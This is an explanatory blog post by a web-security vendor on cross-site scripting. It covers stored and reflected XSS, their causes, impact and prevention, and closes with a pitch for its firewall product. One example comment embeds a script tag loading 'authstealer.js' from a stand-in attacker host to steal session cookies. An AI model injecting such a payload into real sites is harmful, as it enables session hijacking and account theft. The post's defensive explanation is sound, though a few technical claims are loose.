Cross-site scripting or XSS is one of the most dangerous and malicious yet most widespread and common attacks that look to gain access to and control of the users’ browser by using vulnerabilities in the application and thereby, gain access to their confidential and sensitive information. So, what exactly is cross-site scripting?

The attackers use vulnerabilities in these legitimate websites or web applications to inject malicious scripts/ codes that get executed when the unsuspecting victim (user) loads the website. The main difference between XSS attacks and other web-attack vectors is that this client-side code injection attack is not aimed at the web application, but at the users of vulnerable applications.

Types of XSS Attacks

XSS attacks are generally broken down into two types: Stored/ Persistent XSS and Reflected XSS

Stored XSS is considered the most malicious and damaging type of XSS attacks. Here, the malicious payload (injected malicious scripts) is injected directly into the website/web application by exploiting its vulnerabilities, and these injected scripts are saved onto the web browser. So, every time the victim visits the website, the script gets activated. The session cookie of each visitor is sent to the attacker. This is why stored XSS is also known as persistent XSS.

Example: Upon snooping around different websites, a cyber-attacker finds vulnerabilities in the comment section of a specific website which allows users to embed HTML tags in it. So, the attacker embeds a malicious script in the comment section that reads something like Hi there! I am John and I loved this product. You can find my detailed review here. <script src=”http://hackersite.com/authstealer.js”> </script>. So, whenever any user visits the page, whether or not they go to the comments section, the malicious payload is triggered, and that user’s session cookies stolen by the attacker. Using this stolen cookie, the attacker can gain access to personal and confidential information of the user such as bank account details, credit card information, etc.

Reflected XSS is where the malicious payload is embedded into a link and activated only when the user clicks on the link. Here, the malicious payload is not stored but only displayed on the web page in the form of a URL or POST data.

As mentioned earlier, Stored XSS is the most damaging type of XSS attack. There are three major reasons for this:

  • It is persistent, i.e. it keeps getting executed every time the user visits the website.
  • It is invisible to the browsers’ XSS filters, unlike reflected XSS which can be detected by in-built XSS filters of most browsers like Chrome, Edge, etc.
  • It can be triggered off just by visiting the website, unlike reflected XSS attacks where clicking on the malicious link is required. This simply increases the reach of a stored XSS attack.

Web-Application-Scanning

Why do XSS Attacks Happen?

As mentioned earlier, the main reason for XSS attacks is the presence of vulnerabilities and gaps in the web application or website that attackers can identify upon snooping around and use it as a medium to inject the malicious payload.

The gaps could exist because of permissions on the page for unencoded or unvalidated user inputs, and this mostly happens on sites that allow comments, feedback, user posts, etc. such as blogs, social media websites, video and content sharing websites, etc. The vulnerability could also permeate from the legacy or old, redundant VBScript, Active X, JavaScript, Flash Script, etc. that are used in the web application.

Impact

The impact and severity of successful XSS attacks vary widely. XSS attacks could result in session hijacking, stolen tokens and session cookies, CSRF (cross-site request forgery) attacks. These, in turn, lead to the user accounts being compromised and possibly breached into. The attacker then is able to use the stolen cookies to impersonate valid users. In cases where the valid user has administrative rights in the application, the attacker can use the privileges to even alter pages or execute codes on the server side.

Even though the XSS attacks are aimed at the users of web applications, there are heavy losses to the organization as well. How? There are obvious monetary losses. But what costs organizations dearly is the loss of customers, brand image and reputation.

How to Prevent XSS Attacks?

Many browsers have inbuilt filters to prevent XSS attacks but one cannot rely only on the Client side capabilities to prevent attacks.  As a website owner, it is imperative for the business to detect and fix them.  Moreover, XSS Filters present in most web browsers do not filter all variants of XSS attacks. Continuous detection and scanning of your applications along with Web application Firewall (WAF) are one of the most effective and widely used solutions to secure web applications and its users from XSS attacks.

Choosing a comprehensive, intelligent and managed WAF like AppTrana will ensure round-the-clock, customized application security wherein web applications are monitored continuously for vulnerabilities, vulnerabilities are patched instantaneously until fixed by developers, and all bad traffic and malicious requests blocked. It leverages the power of human expertise by employing certified security professionals to conduct validated penetration testing with zero assured false positives, proof of concept and custom rules along with automation. AppTrana is endowed with Machine Learning and Global Intelligence threat platform which enable it to analyze attack behaviors, bot signatures, attack patterns, etc. and consolidate learnings to prevent application attacks including XSS attacks which is the one of most common attack vector used by hackers.

Prevent cross site scripting attacks with Indusface.

Start a Free Trial

Founder & Chief Marketing Officer, Indusface

Venky has played multiple roles within Indusface for the past 6 years. Prior to this, as the CTO @indusface, Venky built the product/service offering and technology team from scratch, and grew it from ideation to getting initial customers with a proven/validated business model poised for scale. Before joining Indusface, Venky had 10+ years of experience in security industry and had held various mgmt/leadership roles in Product Development, Professional Services and Sales @Entrust.